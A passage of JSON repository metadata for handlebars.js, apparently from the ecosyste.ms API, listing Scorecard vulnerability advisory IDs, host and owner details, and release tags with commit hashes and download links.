GHSA-9c47-m6qq-7p4h","Warn: Project is vulnerable to: GHSA-76p3-8jx3-jpfq","Warn: Project is vulnerable to: GHSA-jf85-cpcp-j695","Warn: Project is vulnerable to: GHSA-fvqr-27wr-82fm","Warn: Project is vulnerable to: GHSA-4xc9-xhrj-v574","Warn: Project is vulnerable to: GHSA-x5rq-j2xg-h7qm","Warn: Project is vulnerable to: GHSA-p6mc-m468-83gw","Warn: Project is vulnerable to: GHSA-29mw-wpgm-hmr9","Warn: Project is vulnerable to: GHSA-35jh-r3h4-6jhm","Warn: Project is vulnerable to: GHSA-952p-6rrq-rcjv","Warn: Project is vulnerable to: GHSA-hxm2-r34f-qmc5","Warn: Project is vulnerable to: GHSA-f8q6-p94x-37v3","Warn: Project is vulnerable to: GHSA-vh95-rmgr-6w4m","Warn: Project is vulnerable to: GHSA-xvch-5gv4-984h","Warn: Project is vulnerable to: GHSA-76c9-3jph-rj3q","Warn: Project is vulnerable to: GHSA-28xh-wpgr-7fm8","Warn: Project is vulnerable to: GHSA-9wv6-86v2-598j","Warn: Project is vulnerable to: GHSA-rhx6-c78j-4q9w","Warn: Project is vulnerable to: GHSA-hrpp-h998-j3pp","Warn: Project is vulnerable to: GHSA-p8p7-x288-28g6","Warn: Project is vulnerable to: GHSA-x3m3-4wpv-5vgc","Warn: Project is vulnerable to: GHSA-c2qf-rxjj-qqgw","Warn: Project is vulnerable to: GHSA-m6fv-jmcg-4jfg","Warn: Project is vulnerable to: GHSA-cm22-4g7w-348p","Warn: Project is vulnerable to: GHSA-3jfq-g458-7qm9","Warn: Project is vulnerable to: GHSA-5955-9wpr-37jh","Warn: Project is vulnerable to: GHSA-f5x3-32g6-xq36","Warn: Project is vulnerable to: GHSA-r628-mhmh-qjhw","Warn: Project is vulnerable to: GHSA-9r2w-394v-53qc","Warn: Project is vulnerable to: GHSA-qq89-hq3f-393p","Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6","Warn: Project is vulnerable to: GHSA-72xf-g2v4-qvf3","Warn: Project is vulnerable to: GHSA-7p7h-4mm5-852v","Warn: Project is vulnerable to: GHSA-wr3j-pwj9-hqq6","Warn: Project is vulnerable to: GHSA-cf66-xwfp-gvc4","Warn: Project is vulnerable to: GHSA-4v9v-hfq4-rm2v","Warn: Project is vulnerable to: GHSA-9jgg-88mc-972h","Warn: Project is vulnerable to: GHSA-j8xg-fqg3-53r7","Warn: Project is vulnerable to: GHSA-3h5v-q93c-6h6q","Warn: Project is vulnerable to: GHSA-776f-qx25-q3cc"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-19T09:08:48.273Z","repository_id":998342,"created_at":"2025-08-19T09:08:48.274Z","updated_at":"2025-08-19T09:08:48.274Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":281453692,"owners_count":26504232,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-28T02:00:06.022Z","response_time":60,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"handlebars-lang","name":"The Handlebars Templating Language","uuid":"19378685","kind":"organization","description":"","email":null,"website":"https://handlebarsjs.com/","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/19378685?v=4","repositories_count":8,"last_synced_at":"2024-04-28T02:35:24.096Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/handlebars-lang","funding_links":[],"total_stars":17814,"followers":61,"following":0,"created_at":"2022-11-02T16:37:33.313Z","updated_at":"2024-04-28T02:35:25.495Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/handlebars-lang","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/handlebars-lang/repositories"},"tags":[{"name":"v4.7.8","sha":"8dc3d2517b41d12b1e06f88a449f30d27c137c21","kind":"tag","published_at":"2023-08-01T21:10:59.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.8","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.8/manifests"},{"name":"v4.7.7","sha":"a9a8e403213583ca90cb7c872d3a22796c37d961","kind":"tag","published_at":"2021-02-15T09:36:12.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.7","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.7/manifests"},{"name":"v4.7.6","sha":"e6ad93ea01bcde1f8ddaa4b4ebe572dd616abfaa","kind":"tag","published_at":"2020-04-03T17:56:25.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.6","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.6/manifests"},{"name":"v4.7.5","sha":"1fd2edee2a12fb228061fcde807905c6b14339c4","kind":"tag","published_at":"2020-04-02T19:09:52.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.5","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.5/manifests"},{"name":"v4.7.4","sha":"7adc19ab40917389fc1372d19677f1d024ec42b1","kind":"tag","published_at":"2020-04-01T17:20:34.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.4/manifests"},{"name":"v3.0.8","sha":"16bd606fec0ada4c811eb7afe6bfd619d88f3d37","kind":"tag","published_at":"2020-02-23T10:02:00.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.8","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v3.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.8/manifests"},{"name":"v4.7.3","sha":"c9789691af60b446f12f75dd9762f9d8fd3f36eb","kind":"tag","published_at":"2020-02-05T05:10:35.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.3/manifests"},{"name":"v4.7.2","sha":"586e672c8bba7db787bc9bfe9a9fde4ec98d5b4f","kind":"tag","published_at":"2020-01-13T20:53:16.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.2/manifests"},{"name":"v4.7.1","sha":"14ba3d0c43d75bcfcdbfb7c95c9fac99d88a17c8","kind":"tag","published_at":"2020-01-12T12:21:10.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.1/manifests"},{"name":"v4.7.0","sha":"0d5c807017f8ba6c6d947f9d6852033c8faa2e49","kind":"tag","published_at":"2020-01-10T16:24:09.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"91a1b5d2f456cb733cbd88149fc9270973db79d7","kind":"tag","published_at":"2020-01-08T22:45:17.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.6.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.6.0/manifests"},{"name":"v4.5.3","sha":"c819c8b533934d2ac18001d7eb27a3205b00c2f3","kind":"tag","published_at":"2019-11-18T07:10:26.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.5.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.3/manifests"},{"name":"v4.5.2","sha":"8de121d21c88a6ab877e3a0eec9daaac483f3bf0","kind":"tag","published_at":"2019-11-13T21:07:27.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.5.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.2/manifests"},{"name":"v4.5.1","sha":"7ef86173abb446cf564ad6dc2646a4c361e2ab9f","kind":"tag","published_at":"2019-10-29T04:42:23.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.5.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.1/manifests"},{"name":"v4.5.0","sha":"b24797da01afd4e849fdb315dea8335792974522","kind":"tag","published_at":"2019-10-28T18:47:51.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.5.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.0/manifests"},{"name":"v4.4.5","sha":"8e1cce79186ab6caeb8c6ec9c1f8bcfa1a40e83d","kind":"tag","published_at":"2019-10-20T21:08:10.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.5","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.5/manifests"},{"name":"v4.4.4","sha":"2ab261eab7835e9c80ad1cb7ef9fc9b0f46d6a57","kind":"tag","published_at":"2019-10-20T19:33:00.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.4/manifests"},{"name":"v4.4.3","sha":"2e53fba68f8c51f9aca97615944fdbdeba94ff62","kind":"tag","published_at":"2019-10-08T20:05:35.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.3/manifests"},{"name":"v4.4.2","sha":"b793350fec0bb652c0bb2658089d7002af27a76b","kind":"tag","published_at":"2019-10-02T20:44:36.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.2/manifests"},{"name":"v4.2.2","sha":"0d5c691f36baae183349c51c47228da45278c50a","kind":"tag","published_at":"2019-10-02T20:12:55.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.2.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.2/manifests"},{"name":"v4.3.5","sha":"e96c1a5d86d8b2e8b152578fa37d5cdebc2964a3","kind":"tag","published_at":"2019-10-02T20:05:02.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.5","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.5/manifests"},{"name":"v4.4.1","sha":"b8e769fcb624664a6bc7114c8739c2438d46dbe9","kind":"tag","published_at":"2019-10-02T19:52:34.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"059b33057925ebda96536421cfc7c4c75e5c61e3","kind":"tag","published_at":"2019-09-29T13:29:13.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.0/manifests"},{"name":"v4.3.4","sha":"c958cc89550ca411a78fefa426b0acee80c702eb","kind":"tag","published_at":"2019-09-28T11:25:05.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.4/manifests"},{"name":"v4.3.3","sha":"e4738491b3e8db97aa9b4f9967f04093ceba1a1f","kind":"tag","published_at":"2019-09-27T05:46:55.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.3/manifests"},{"name":"v4.3.2","sha":"2357140c68d17cb4f8ab74431e8737de6b4b39b5","kind":"tag","published_at":"2019-09-26T21:58:48.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.2/manifests"},{"name":"v4.3.1","sha":"050cca0866b3496852d9b198141807c32e4dae81","kind":"tag","published_at":"2019-09-24T22:32:32.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.1/manifests"},{"name":"v4.3.0","sha":"a89081d440a9da9f3f25835f47de837907b0094a","kind":"tag","published_at":"2019-09-24T06:04:35.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.0/manifests"},{"name":"v4.2.1","sha":"fff3e40402c9f9cd790984560658646a26e1c930","kind":"tag","published_at":"2019-09-20T17:40:48.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.2.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.1/manifests"},{"name":"v4.2.0","sha":"164c7ceea4ce074f70f2fefeba81e2e551757ea6","kind":"tag","published_at":"2019-09-03T19:58:07.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.2.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.0/manifests"},{"name":"v4.1.2-0","sha":"f98c6a54256fec0b36ae1adc4c36ab5412ca3b88","kind":"tag","published_at":"2019-08-25T16:06:35.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.1.2-0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.1.2-0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.1.2-0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.2-0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.2-0/manifests"},{"name":"v3.0.7","sha":"55e4d9d80d5dd834fcf53c528e7e0aa080f315a5","kind":"tag","published_at":"2019-06-30T08:53:59.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.7","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v3.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.7/manifests"},{"name":"v4.0.14","sha":"272362e44c66d0110a4c98c7c1d121971ce447a7","kind":"tag","published_at":"2019-04-13T14:39:19.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.14","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.14/manifests"},{"name":"v4.1.2","sha":"10b5fcf92e6f3ddcbcec93c05c00cfdbb2e8d303","kind":"tag","published_at":"2019-04-13T14:19:22.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.1.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"f691db546e7563e1db3437d5a72f478f9e556714","kind":"tag","published_at":"2019-03-16T21:28:38.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.1.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.1/manifests"},{"name":"v4.0.13","sha":"9d4fff19d438a390b4e34d0a175b2de5f196cea8","kind":"tag","published_at":"2019-02-07T10:26:00.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.13","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13/manifests"},{"name":"v4.1.0","sha":"7caca944b1ae64b5bc11cba67d21e4b51ba6196a","kind":"tag","published_at":"2019-02-07T09:46:32.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.